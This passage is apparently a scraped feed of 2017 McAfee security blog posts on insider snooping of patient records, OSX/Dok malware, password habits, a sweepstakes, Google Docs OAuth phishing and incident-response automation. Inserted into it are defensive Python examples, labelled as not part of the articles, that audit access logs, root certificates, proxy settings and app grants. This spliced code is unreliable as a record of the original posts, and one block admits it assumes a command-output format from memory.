And there is the rub. Demme had authorized access to the information. It was her alleged pilfering of Percocet from the dispensary that apparently was the impetus for the internal investigation within Osler. It does not appear to have been her sifting through patient files looking for the ones who had Percocet prescriptions.

One of the most difficult tasks for protection of PII/PHI for health care providers is the electronic audit process. The audit trail will show patient data being accessed by an authorized user. Does the audit trail correlate to an actual need to know by the authorized user? This is the more difficult question.

That is to say, is the patient whose records are being accessed presenting themselves for treatment or consult?

The question for health care information technology teams is: would your organization know whether the patient data being accessed belongs to a patient who is currently receiving care?

Are the various physical touch points with patients (telephone, consults, in/out patient appointments, etc.) within the medical engagement associated with authorized user access to medical records?

Collating and processing such disparate data will provide clarity, not only within the health care sector but also in the protection of any sensitive data.

The key can be found within the answer to the question: Do your data protection technologies distinguish between “need to know” and “curiosity or malevolent access?”
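The correlation the article calls for, as an added example that is not part of the article or of Osler’s systems: a small Python check that joins audit-trail lines against a constructed encounter schedule and flags any record access by an authorized user for a patient who had no encounter involving that user around the time of the access. The log format, user and patient identifiers, the 24-hour grace window and every record below are constructed assumptions.

```python
"""Correlate EHR audit-trail accesses with active patient encounters.

Added example (not from the article). An access is "need to know" only when
the patient had an encounter whose care team includes the accessing user and
whose window (plus a grace period) covers the access time. Everything else is
flagged for review: care-team mismatch, historical-only patients, no encounter.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed audit-trail lines in a hypothetical "timestamp|user|patient|action" format.
AUDIT_LINES = [
    "2017-01-10T08:05:00|nurse_a|P1001|VIEW_MEDS",
    "2017-01-10T08:07:00|nurse_a|P1002|VIEW_MEDS",  # nurse_a not on P1002's care team
    "2017-01-10T08:09:00|nurse_a|P1003|VIEW_MEDS",  # P1003 last seen years ago
    "2017-01-10T08:11:00|nurse_a|P1004|VIEW_MEDS",  # P1004 has no encounter at all
    "2017-01-10T14:30:00|dr_b|P1001|VIEW_CHART",
]


@dataclass
class Encounter:
    """One episode of care: which staff were involved with which patient, and when."""
    patient: str
    start: datetime
    end: datetime
    care_team: frozenset


# Constructed encounter schedule (would come from scheduling/ADT feeds in practice).
ENCOUNTERS = [
    Encounter("P1001", datetime(2017, 1, 10, 7, 0), datetime(2017, 1, 10, 16, 0),
              frozenset({"nurse_a", "dr_b"})),
    Encounter("P1002", datetime(2017, 1, 10, 9, 0), datetime(2017, 1, 10, 12, 0),
              frozenset({"dr_b"})),
    # Historical record: matches the "not using Osler's services in years" pattern.
    Encounter("P1003", datetime(2014, 3, 2, 9, 0), datetime(2014, 3, 2, 11, 0),
              frozenset({"nurse_a"})),
]


def parse_line(line):
    """Split one constructed audit line into (timestamp, user, patient, action)."""
    ts, user, patient, action = line.strip().split("|")
    return datetime.fromisoformat(ts), user, patient, action


def has_need_to_know(user, patient, when, encounters, grace=timedelta(hours=24)):
    """True if some encounter for this patient includes the user and covers the access time."""
    for enc in encounters:
        if enc.patient != patient or user not in enc.care_team:
            continue
        if enc.start - grace <= when <= enc.end + grace:
            return True
    return False


def flag_suspicious(lines, encounters, grace=timedelta(hours=24)):
    """Return (user, patient, action, iso_time) for every access lacking a need-to-know link."""
    flagged = []
    for line in lines:
        when, user, patient, action = parse_line(line)
        if not has_need_to_know(user, patient, when, encounters, grace):
            flagged.append((user, patient, action, when.isoformat()))
    return flagged


def accesses_per_user(flagged):
    """Count flagged accesses per user; a high count in a short window is the review trigger."""
    counts = {}
    for user, *_ in flagged:
        counts[user] = counts.get(user, 0) + 1
    return counts


if __name__ == "__main__":
    hits = flag_suspicious(AUDIT_LINES, ENCOUNTERS)
    for hit in hits:
        print("REVIEW:", hit)
    print(accesses_per_user(hits))
```

The grace window is the policy knob: pre-admission chart review and post-discharge follow-up are legitimate, so a zero window floods reviewers, while a window of weeks hides the historical-record pattern the article describes. Tune it per role and action rather than globally.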

While no reference has been made to a violation of Canada’s Personal Health Information Protection Act (PHIPA), available information certainly points in this direction. According to CTV-News, Osler is taking steps to preclude a recurrence of this “type of event.”


This article was written by Christopher Burgess from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Need a fix? Steal patient data appeared first on McAfee Blogs.

New Mac Malware Manages to Spy on Encrypted Browser Traffic https://securingtomorrow.mcafee.com/business/new-mac-malware-manages-spy-encrypted-browser-traffic/ https://securingtomorrow.mcafee.com/business/new-mac-malware-manages-spy-encrypted-browser-traffic/#respond Thu, 04 May 2017 19:00:56 +0000 https://securingtomorrow.mcafee.com/?p=73462 This blog was written by Douglas McKee. There’s a new cyberattack targeted at Mac OS users—a malware program called OSX/Dok. Discovered late last week primarily in Europe, the program is capable of spying on encrypted browser traffic to steal sensitive information. You heard correctly: it can eavesdrop on all of your web browsing. How does …

This blog was written by Douglas McKee.

There’s a new cyberattack targeted at Mac OS users—a malware program called OSX/Dok. Discovered late last week primarily in Europe, the program is capable of spying on encrypted browser traffic to steal sensitive information. You heard correctly: it can eavesdrop on all of your web browsing.

How does this attack work?

First, the Trojan is digitally signed with a previously valid Apple certificate. It initially relies on social engineering, first phishing for credentials through either email or by displaying a full-screen alert that claims there’s an urgent OS X update waiting to be installed. Once it gets access, the Trojan makes the necessary changes it needs to infiltrate the user’s browsing activity.

It elevates the privileges of the current user to a permanent administrator and bypasses additional password prompts, keeping the rest of the infection process quiet. Dok also replaces existing login entries with its own so it runs when the user logs onto the computer. Then, it redirects all traffic to the Dark Web through a malicious proxy server and installs its own root certificate on the machine. From there, the attacker can carry out a man-in-the-middle attack and decrypt the user’s HTTPS traffic by pretending to be whichever website the victim attempts to access.

Since browsers typically alert users of compromised website connections, how are they not catching this attack? Because of the bad root certificate.
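The two artifacts this post describes, an unexpected root certificate and a system proxy, are exactly what a defender can baseline and diff. The following Python check is an added example, not code from the McAfee post: it takes the text that macOS prints for `security find-certificate -a -p <keychain>` (PEM dump) and `networksetup -getwebproxy` / `-getautoproxyurl <service>` (key/value lines, a format assumed here from memory), fingerprints every certificate by SHA-256 of its DER bytes, and reports anything not in a known-good baseline plus any enabled proxy. The certificate blobs, the proxy URL and the baseline below are constructed placeholders, not Dok indicators.

```python
"""Baseline diff for a Dok-style foothold: unknown root certificate + system proxy.

Added example, not from the McAfee post. Feed the real command output into
audit_host() on a Mac; the constants below are constructed so it runs offline.
"""
import base64
import hashlib
import re

# Matches each certificate in a PEM dump such as `security find-certificate -a -p`.
PEM_RE = re.compile(
    r"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)

# Constructed "certificates": arbitrary base64 bytes standing in for real DER.
KNOWN_GOOD_PEM = (
    "-----BEGIN CERTIFICATE-----\nAAECAwQFBgcICQ==\n-----END CERTIFICATE-----\n")
EXTRA_PEM = (
    "-----BEGIN CERTIFICATE-----\n/v7+/v7+/v4=\n-----END CERTIFICATE-----\n")
CURRENT_DUMP = KNOWN_GOOD_PEM + EXTRA_PEM  # what the host shows today

# Constructed networksetup output (format assumed from memory of the tool).
WEBPROXY_CLEAN = "Enabled: No\nServer: \nPort: 0\nAuthenticated Proxy Enabled: 0\n"
AUTOPROXY_CLEAN = "URL: (null)\nEnabled: No\n"
AUTOPROXY_SUSPICIOUS = "URL: http://127.0.0.1:5555/example.pac\nEnabled: Yes\n"


def pem_fingerprints(pem_text):
    """SHA-256 hex fingerprint of every DER certificate in a PEM dump, in order."""
    fps = []
    for b64 in PEM_RE.findall(pem_text):
        der = base64.b64decode("".join(b64.split()))
        fps.append(hashlib.sha256(der).hexdigest())
    return fps


# Baseline captured from a known-clean machine (here: the constructed good cert).
BASELINE = frozenset(pem_fingerprints(KNOWN_GOOD_PEM))


def unexpected_roots(pem_text, baseline):
    """Fingerprints present on the host but absent from the baseline."""
    return [fp for fp in pem_fingerprints(pem_text) if fp not in baseline]


def parse_kv(text):
    """Turn 'Key: Value' lines (networksetup style) into a dict."""
    out = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            out[key.strip()] = value.strip()
    return out


def proxy_findings(webproxy_text, autoproxy_text):
    """Human-readable findings for any enabled HTTP proxy or proxy auto-config URL."""
    findings = []
    web = parse_kv(webproxy_text)
    if web.get("Enabled") == "Yes":
        findings.append(f"web proxy enabled: {web.get('Server')}:{web.get('Port')}")
    auto = parse_kv(autoproxy_text)
    if auto.get("Enabled") == "Yes":
        findings.append(f"proxy auto-config enabled: {auto.get('URL')}")
    return findings


def audit_host(pem_text, baseline, webproxy_text, autoproxy_text):
    """Combine both checks; an empty list means nothing diverged from the baseline."""
    findings = [f"unknown certificate in trust store: sha256={fp}"
                for fp in unexpected_roots(pem_text, baseline)]
    findings.extend(proxy_findings(webproxy_text, autoproxy_text))
    return findings


if __name__ == "__main__":
    for line in audit_host(CURRENT_DUMP, BASELINE, WEBPROXY_CLEAN, AUTOPROXY_SUSPICIOUS):
        print("FINDING:", line)
```

The point of fingerprinting the DER rather than comparing subject names is that a malicious root can copy any display name it likes; the hash cannot be forged without a collision. A proxy finding and a certificate finding on the same host, together, are the combination that lets an intercepting proxy read HTTPS without a browser warning.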

How do you protect yourself?

Apple mitigated the risk by revoking the certificate used in the attack. But there’s still more you can do to protect yourself from this attack and others like it.

NEVER open attachments or click on links from unknown senders. Also, check the source of the email and ensure legitimacy. Always be cautious whenever you’re asked to provide credentials.

Whenever possible, Apple users should only install apps from the Apple app store to ensure they’re only using applications that Apple has screened and approved.

To learn more about this cyberattack and others like it, make sure to follow @McAfee and @McAfee_Business.

The post New Mac Malware Manages to Spy on Encrypted Browser Traffic appeared first on McAfee Blogs.

World Password Day RT to Win Sweepstakes https://securingtomorrow.mcafee.com/consumer/password-day-sweepstakes/ https://securingtomorrow.mcafee.com/consumer/password-day-sweepstakes/#respond Thu, 04 May 2017 13:01:53 +0000 https://securingtomorrow.mcafee.com/?p=73391 Terms and Conditions How to Win: Happy World #PasswordDay! Once completed share your results on Twitter and tag @McAfee_Home, #PasswordDay, #RT2Win, and #Sweepstakes for a chance at a $50 Amazon Gift card. Two total winners will be selected: the first drawing will happen on May 11, 2017, and the second drawing will happen on May …

Terms and Conditions

How to Win:

Happy World #PasswordDay! Once completed share your results on Twitter and tag @McAfee_Home, #PasswordDay, #RT2Win, and #Sweepstakes for a chance at a $50 Amazon Gift card. Two total winners will be selected: the first drawing will happen on May 11, 2017, and the second drawing will happen on May 19, 2017.  Winners will be posted on Twitter and notified by direct message.

For full Sweepstakes details, please see the Terms and Conditions below:

McAfee World Password Day #RT2Win Sweepstakes Terms and Conditions

  1. How to enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee’s World Password Day #RT2Win Sweepstakes will be conducted for three weeks, from May 4th through May 19th. All entries for each day of the McAfee World Password Day #RT2Win Sweepstakes must be received during the time allotted for the World Password Day #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee World Password Day #RT2Win Sweepstakes. One winner will be chosen for each of the World Password Day #RT2Win ads. The McAfee World Password Day #RT2Win Sweepstakes duration is as follows.

World Password Day #RT2Win Sweepstakes:

  • Thursday, May 4th – Thursday, May 11th
    • One winner announced Thursday, May 11th, 12:00pm PST
  • Friday, May 12th – Friday, May 19th
    • One winner announced: Thursday, May 19th, 12:00pm PST

For the McAfee World Password Day #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee World Password Day #RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day, which will include the hashtags: #RT2Win, #Sweepstakes, and #PasswordDay
  2. Retweet the sweepstakes tweet of the day and make sure it includes both the #RT2Win, #Sweepstakes, and #PasswordDay hashtags.

One winner will be chosen for each McAfee World Password Day #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included the #RT2Win, #Sweepstakes and #PasswordDay hashtags. McAfee and the McAfee social team will choose a winner from all the viable entries. The winner of each week will be announced by 12:00pm PDT the following week on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. Participants are only eligible to win in one of the two drawings.

  1. Eligibility: 

McAfee World Password Day #RT2Win Sweepstakes is open to all legal residents of the 50 United States or District of Columbia who are 18 years of age or older on the date the McAfee World Password Day #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and McAfee World Password Day #RT2Win Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

  1. Winner Selection:

Winners will be selected from the eligible entries received during each of the McAfee World Password Day #RT2Win Sweepstakes periods. Sponsor will select the names of [2] potential winners of the prizes in a random drawing from among all eligible Submissions at the address listed below. The odds of winning depend on the number of eligible entries received. Participants will only be eligible to win one of the weeks. By participating, entrants agree to be bound by the Official McAfee World Password Day #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: Each winner will be notified via direct message (“DM”) on Twitter.com by 12:00pm PDT on each of the days listed above. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

  1. Prizes: 

The prize for each McAfee World Password Day #RT2Win Sweepstakes is a $50 Amazon e-gift card (approximate retail value “ARV” of the prize is $50 USD).

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee World Password Day #RT2Win Sweepstakes and all matters or disputes arising from the McAfee World Password Day #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.
Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

  1. General conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner.

Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee World Password Day #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee World Password Day #RT2Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee World Password Day #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee World Password Day #RT2Win Sweepstakes -related activity, or participation in the McAfee World Password Day #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

Limitations of Liability; Releases: By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING, NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

  1. TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE EXCEED $10. THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.
  2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

Prize Forfeiture: If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize McAfee World Password Day #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee World Password Day #RT2Win Sweepstakes.

Dispute Resolution:  Entrants agree that Sponsor has the sole right to determine the winners of the McAfee World Password Day #RT2Win Sweepstakes and all matters or disputes arising from the McAfee World Password Day #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law & Disputes: EACH ENTRANT AGREES THAT ANY DISPUTES, CLAIMS, AND CAUSES OF ACTION ARISING OUT OF OR CONNECTED WITH THIS SWEEPSTAKES OR ANY PRIZE AWARDED WILL BE RESOLVED INDIVIDUALLY, WITHOUT RESORT TO ANY FORM OF CLASS ACTION and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy: Personal information obtained in connection with this prize McAfee World Password Day #RT2Win Sweepstakes will be handled in accordance with the policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after May 19th 2017 and before May 19th 2018 to the address listed below, Attn: World Password Day #RT2Win Sweepstakes. To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed below, Attn: Margie Easter. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2017 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters, 2821 Mission College Blvd., Santa Clara, CA 95054 USA

The post World Password Day RT to Win Sweepstakes appeared first on McAfee Blogs.

Is Your Password a Priority? Top Takeaways From Our World Password Survey
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/password-habits/
Thu, 04 May 2017 04:01:47 +0000

The post Is Your Password a Priority? Top Takeaways From Our World Password Survey appeared first on McAfee Blogs.
Whether you’re signing up for a new video-streaming service, logging back into your email, or checking your online banking, passwords play a big part in our everyday lives. They help us buy what we want, stream our favorite entertainment, retrieve critical information, and most importantly, keep our personal information out of the wrong hands. But, in the modern digital world, our connected lifestyles make it so that we all have more online accounts than ever before, which means more passwords than ever. That, in turn, has created some mixed emotions towards these gatekeepers. So, to see just exactly how consumers think and feel about their passwords, and in honor of World Password Day, we conducted a survey amongst 3,000 people across Australia, France, Germany, the U.K., and the U.S., and discovered a few key takeaways that we’d like to share with you:

Storage Stays Old School

Consumers are living a connected lifestyle now more than ever, which means they’re downloading more apps, accessing more websites, and creating more accounts—all of which require a password. That also means consumers have to somehow keep track of more passwords.

So, with such a large amount to remember, how do people organize their passwords so that they can recall them when the time comes to log back into their account? As it turns out, our survey discovered that one of the most popular ways individuals keep track of passwords is by writing them down. Specifically, a total of 37% of respondents track the old-fashioned way, admitting to keeping a list with all of their passwords on paper, which they place somewhere they deem safe.

Another more traditional, and less secure, methodology behind storing passwords is simply reusing passwords across multiple accounts, with 34% of respondents in the U.S. admitting to doing this on a regular basis.

Luckily, using a password manager came in as the third most common storage method, with 20% claiming they do in fact use some type of management software. Password managers are the best of both worlds, since they allow us to quickly and easily access our information without having to sacrifice our personal security in the process. Plus, they make it so we don’t have to jog our memory to recall one of our many passwords.

Remembering is Frustrating

In fact, it is the act of remembering that is creating a sense of frustration for consumers, causing them to turn to these old-school storage techniques. Just how much of a pain point is remembering all these passwords? Over a quarter (26%) of individuals would be willing to give up pampering (manicures, pedicures, massages, etc.) if they never had to remember a password again. And 10% of those surveyed claimed that they would be willing to give up their favorite food in exchange for not having to remember passwords.

Access is Still More Important Than Protection

People’s need to easily and quickly access their email, social media, whatever it may be, has made personal security a low priority amongst consumers. In fact, when creating passwords, less than half (46%) of respondents claim that their main concern is security strength. Sadly, 34% are most concerned with the ease of remembering their passwords, and shockingly, 59% of respondents are open to sharing their passwords with others. The most common passwords shared were for video streaming apps with just under a quarter (23%) claiming they are comfortable sharing their password to these services.

Clearly, password security needs to become more top of mind for consumers. That’s where we can help. Whether you’re creating a new account online, or trying to remember an old password for a site, keep these security tips in mind to ensure your account information, and therefore your personal data, doesn’t get into the wrong hands:

-Create strong passwords. Passwords are the keys to our digital lives, so make sure you create strong and unique passwords to keep unwanted people out. The more complex your password is, the more difficult it will be to crack. Not to mention, make sure to avoid common and easy-to-crack passwords like “12345” or “password.”

-Utilize multi-factor authentication (MFA). Having multiple factors to authenticate your accounts, like your fingerprint, face, or a trusted device, both improves security and makes accessing your online accounts easier. If you use a service that offers MFA, be sure to enable it. The more factors you can combine, the safer your accounts will be.

-Use a password manager. Take your security to another level with a password manager, like the True Key app. A password manager can help you create strong and secure passwords, remove the hassle of remembering numerous passwords and log you into your favorite websites automatically using multi-factor authentication.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

Heads Up: Massive Google Doc Phishing Scam Has Hit the Scene and is Spreading Fast
https://securingtomorrow.mcafee.com/business/heads-massive-google-doc-phishing-scam-hit-scene-spreading-fast/
Wed, 03 May 2017 23:02:50 +0000

The post Heads Up: Massive Google Doc Phishing Scam Has Hit the Scene and is Spreading Fast appeared first on McAfee Blogs.
Practically everyone uses Google Docs—you can collaborate with coworkers and friends, sharing any information you want to in real-time. Now, a new cyberattack has emerged in which a Google Doc phishing link is sent to a victim, hoping they click it and infect themselves with malware. But here’s the catch—this nasty malware manages to mask itself as a sender who is a familiar face to the victim. And unfortunately, it is pretty convincing.

This phishing scam has hit Gmail inboxes everywhere today. And, leveraging a common social engineering technique, it looks exactly like an email from a friend would. Here’s a screenshot of what the message looks like in a victim’s inbox, as provided by Fortune:

[Image: screenshot of the phishing message as it appears in a victim’s inbox, via Fortune]

So, what happens if you click on the malicious link in your inbox? First, you arrive at a login screen that looks almost identical to the same screen you’d see if someone actually invited you to a Google Doc. It lists your Google Accounts, and it even reflects Google’s recent redesign. What’s worse—the page manages to resemble a very realistic Google.com URL and clicking on the link appears to confirm the page’s legitimacy.

Then, that page invites you to choose which account you’d like to use to view the Google Doc, and you’re taken to a page that invites you to grant access to your Google Account. Basically, you’ve just given the cybercriminal launching the attack access to your entire Gmail account.

Beyond social engineering its victims, this attack’s success is dependent on a flaw in Google’s security design. The page that lists the apps with access to your Gmail account isn’t able to distinguish between apps that are made by Google and apps that aren’t.
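Because the app list cannot tell a first-party app from a third-party one that merely calls itself “Google Docs”, a review of granted apps has to do that check itself. The following Python is an added example, not code from this post or from Google: it normalizes app display names, flags third-party grants whose name mimics a real product (including lookalike spellings), and flags mailbox or contacts access held by anyone other than Google. The grant records, the `google` publisher tag and the scope names are constructed sample data, not a real Google API or its output.

```python
import difflib
import unicodedata

FIRST_PARTY = "google"                      # constructed publisher tag for Google's own apps
PRODUCT_NAMES = ["google docs", "google drive", "gmail", "google sheets"]
MAILBOX_SCOPES = {"mail.read", "mail.send", "contacts.read"}   # constructed scope names
LOOKALIKE_THRESHOLD = 0.85                  # difflib similarity needed to call a name a lookalike

def normalize(name):
    """Casefold and strip accents and odd whitespace so 'Google Docs' and 'Gōogle  Docs' compare alike."""
    decomposed = unicodedata.normalize("NFKD", name)
    stripped = "".join(c for c in decomposed if not unicodedata.combining(c))
    return " ".join(stripped.casefold().split())

def lookalike(name):
    """Return the real product name this display name matches or mimics, else None."""
    n = normalize(name)
    if n in PRODUCT_NAMES:
        return n
    match = difflib.get_close_matches(n, PRODUCT_NAMES, n=1, cutoff=LOOKALIKE_THRESHOLD)
    return match[0] if match else None

def audit(grant):
    """Return review reasons for one grant record; an empty list means nothing suspicious."""
    reasons = []
    third_party = grant["publisher"] != FIRST_PARTY
    mimicked = lookalike(grant["app_name"])
    if third_party and mimicked:
        reasons.append(f"third-party app named like '{mimicked}'")
    risky = MAILBOX_SCOPES & set(grant["scopes"])
    if third_party and risky:
        reasons.append("mailbox/contacts access: " + ", ".join(sorted(risky)))
    return reasons

# Constructed grant records: one genuine Google app, one impersonator with full
# mailbox access (the pattern this post describes), one lookalike name, one benign app.
SAMPLE_GRANTS = [
    {"app_name": "Google Docs", "publisher": "google", "scopes": ["drive.file"]},
    {"app_name": "Google Docs", "publisher": "example-dev-42",
     "scopes": ["mail.read", "mail.send", "contacts.read"]},
    {"app_name": "Gōogle Drive", "publisher": "example-dev-7", "scopes": ["drive.file"]},
    {"app_name": "Slack", "publisher": "slack", "scopes": ["profile"]},
]

def suspicious(grants):
    """Map each flagged app's name and publisher to its reasons."""
    return {(g["app_name"], g["publisher"]): audit(g) for g in grants if audit(g)}
```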

Fortunately, Google has already responded to the incident and plugged the holes. As a spokesperson stated, “We have taken action to protect users against an email spam campaign impersonating Google Docs, which affected fewer than 0.1% of Gmail users. We protected users from this attack through a combination of automatic and manual actions, including removing the fake pages and applications, and pushing updates through Safe Browsing, Gmail, and other anti-abuse systems.” Regarding the extent of damage done to that 0.1%, the spokesperson said, “While contact information was accessed and used by the campaign, our investigations show that no other data was exposed.”

Additionally, the tech giant responded to the attack by releasing a new security feature for Gmail on Android that warns users when they click on a suspicious link in an email.

So, what happens if you’re sent a questionable link from a “friend” today? The good news is this phishing email has been consistently addressed to “hhhhhhhhhhhhhh,” so clearly you can identify the attack that way. And if you do in fact receive this scam, do not click the link.

Clicking on links from your email is highly risky. McAfee chief scientist Raj Samani warns, “Phishing attacks remain the most common method of manipulating individuals into clicking on links and ultimately installing malicious content onto their systems.”

Samani suggests being aware of the emails that you’re expecting and being wary of every unexpected email. “Go straight to the source through a different communication channel if you receive a link you were not expecting. Also, hover over links to see if it is a reliable URL. Or search online for other instances of this campaign and what those instances could tell you about the email’s legitimacy.”

Then, delete suspicious emails entirely. In the case of this scam, make sure to report receiving it to Google as they’ve requested (see below).

Unfortunately, though there has been some speculation, it is yet to be determined who is responsible for this attack.

To gain further insight on how to protect yourself from phishing scams like this and to stay up-to-date on all cybersecurity news, make sure to follow @McAfee and @McAfee_Business.

Automated mitigation on endpoint devices and networks can be tricky
https://securingtomorrow.mcafee.com/business/optimize-operations/automated-mitigation-on-endpoint-devices-and-networks-can-be-tricky/
Wed, 03 May 2017 22:42:53 +0000

The post Automated mitigation on endpoint devices and networks can be tricky appeared first on McAfee Blogs.
Many companies have automated systems in place for preventing, detecting, and investigating security incidents, but automating the incident response and mitigation process for networks and endpoint devices has been a tougher nut to crack.

That includes actions such as automatically re-imaging endpoint devices, isolating devices from corporate networks, or shutting down particular network processes in order to quickly and efficiently respond to attacks.

“I think there’s a lot of potential,” said Joseph Blankenship, analyst at Forrester Research. “We’re definitely in a period of discovery, though, and that has to take place before we’re going to see widespread, mainstream adoption.”

Enterprises first need to get more experience with security automation tools, he said, and see what impact they have.

But full incident response automation is probably three to five years from becoming reality, he said.

“I think we’re seeing some early attempts,” he said. “Say, if every time you see the same threat indicator, the analyst gets action recommendations from an automated tool or machine learning algorithm and makes the same choice, to click yes, let’s go ahead and take the next step. Then if we do that 500 or 1,000 times we can agree that this is a process that we can fully automate and take the analyst fully out of the loop.”

At that point, the analysts can focus on their more difficult, complex situations.

But companies can also approach automation without a machine learning system, if they already have incident response playbooks in use at their company, said Ariel Tseitlin, partner at Foster City, Calif.-based investment firm Scale Venture Partners.

“Take one of those playbooks, and take security automation tools, and test how much of that playbook can be automated,” he said. “That’s a very practical and real way of going and determining if a tool is applicable for an individual environment and how much benefit you can get from it.”

Even partial automation can be very effective, he said.

“Say you have malware on an endpoint, and your playbook for that has 50 steps in it,” he said. “If you can, say, automate 80 percent of it, you can see how many hours of savings you’ll get for your security team, and you can quickly get proof of value.”

Tseitlin said that he talks with customers when deciding whether to invest in any particular security startup, and he’s finding that there’s already real value that’s being realized.

One key factor that determines whether a particular incident response technology works is whether the enterprise itself is ready for automation.

“Different companies are at different stages of security maturity,” he said. “If you haven’t thought about the process, then thinking about automation is really premature. The first thing you have to do is map out the risks, threats and controls, and then you think about how you go through implementing each of those controls. But then when you’ve gone through that, automation is a great way to accelerate and improve the efficiency of the organization.”

Cleaning up the end points

One of the earliest uses of automation on endpoint devices has been to quarantine or remove malware files before they do any damage.

Almost every PC now has some form of anti-virus, and many companies are also using behavior-based malware detection to spot new threats.

A manual response would be too slow, since malware can act quickly to damage a device, or even to start spreading to other machines on the same network.

“So it’s not a new concept,” said Rob Clyde, security consultant and member of the ISACA board of directors.

But what happens if a user clicks on a malicious link or attachment, and installs malware that is able to evade all the defenses, install itself on the machine, and begin to do damage?

